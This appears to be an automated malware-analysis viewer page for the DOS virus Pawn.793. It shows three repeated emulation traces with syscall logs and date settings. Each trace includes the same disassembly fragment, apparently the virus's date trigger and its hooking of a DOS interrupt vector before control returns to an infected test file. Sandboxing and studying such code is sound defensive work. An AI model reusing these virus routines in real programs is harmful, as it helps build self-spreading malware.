Sample viewer

vx.netlux.org/Virus.DOS.Pawn.793

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:48:43.748868659Z 243 PC: 13e82 | UNKNOWN!
2018-12-17T22:48:43.750246903Z 42 PC: 13ed6 | Get date 0x13ed6: cmp dh, 0xa
0x13ed9: jne 0x13ee2
0x13edb: cmp al, 0x13
0x13edd: jne 0x13ee2
0x13edf: jmp 0x140c5
0x13ee2: xor ax, ax
0x13ee4: mov ds, ax
0x13ee6: mov ax, word ptr [0x84]
0x13ee9: mov bx, word ptr [0x86]
0x13eed: mov word ptr es:[0x401], ax
0x13ef1: mov word ptr es:[0x403], bx
0x13ef6: cli
0x13ef7: mov word ptr [0x84], 0x24e
0x13efd: mov word ptr [0x86], es
0x13f01: sti
0x13f02: push cs
0x13f03: pop es
0x13f04: jmp 0x13e8a
0x13f06: inc word ptr cs:[0x20e]
0x13f0b: cmp word ptr cs:[0x20e], 0x1554
2018-12-17T22:48:43.759038647Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-17T22:48:43.76528586Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9650,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:22.605270104Z 243 PC: 13e82 | UNKNOWN!
2018-12-25T12:23:22.606435786Z 42 PC: 13ed6 | Get date 0x13ed6: cmp dh, 0xa
0x13ed9: jne 0x13ee2
0x13edb: cmp al, 0x13
0x13edd: jne 0x13ee2
0x13edf: jmp 0x140c5
0x13ee2: xor ax, ax
0x13ee4: mov ds, ax
0x13ee6: mov ax, word ptr [0x84]
0x13ee9: mov bx, word ptr [0x86]
0x13eed: mov word ptr es:[0x401], ax
0x13ef1: mov word ptr es:[0x403], bx
0x13ef6: cli
0x13ef7: mov word ptr [0x84], 0x24e
0x13efd: mov word ptr [0x86], es
0x13f01: sti
0x13f02: push cs
0x13f03: pop es
0x13f04: jmp 0x13e8a
0x13f06: inc word ptr cs:[0x20e]
0x13f0b: cmp word ptr cs:[0x20e], 0x1554
2018-12-25T12:23:22.618602889Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:23:22.623882993Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":1,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9650,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:22.73888514Z 243 PC: 13e82 | UNKNOWN!
2018-12-25T12:23:22.740228318Z 42 PC: 13ed6 | Get date 0x13ed6: cmp dh, 0xa
0x13ed9: jne 0x13ee2
0x13edb: cmp al, 0x13
0x13edd: jne 0x13ee2
0x13edf: jmp 0x140c5
0x13ee2: xor ax, ax
0x13ee4: mov ds, ax
0x13ee6: mov ax, word ptr [0x84]
0x13ee9: mov bx, word ptr [0x86]
0x13eed: mov word ptr es:[0x401], ax
0x13ef1: mov word ptr es:[0x403], bx
0x13ef6: cli
0x13ef7: mov word ptr [0x84], 0x24e
0x13efd: mov word ptr [0x86], es
0x13f01: sti
0x13f02: push cs
0x13f03: pop es
0x13f04: jmp 0x13e8a
0x13f06: inc word ptr cs:[0x20e]
0x13f0b: cmp word ptr cs:[0x20e], 0x1554
2018-12-25T12:23:22.742352523Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:23:22.747577635Z 0 PC: 12a89 | Program terminate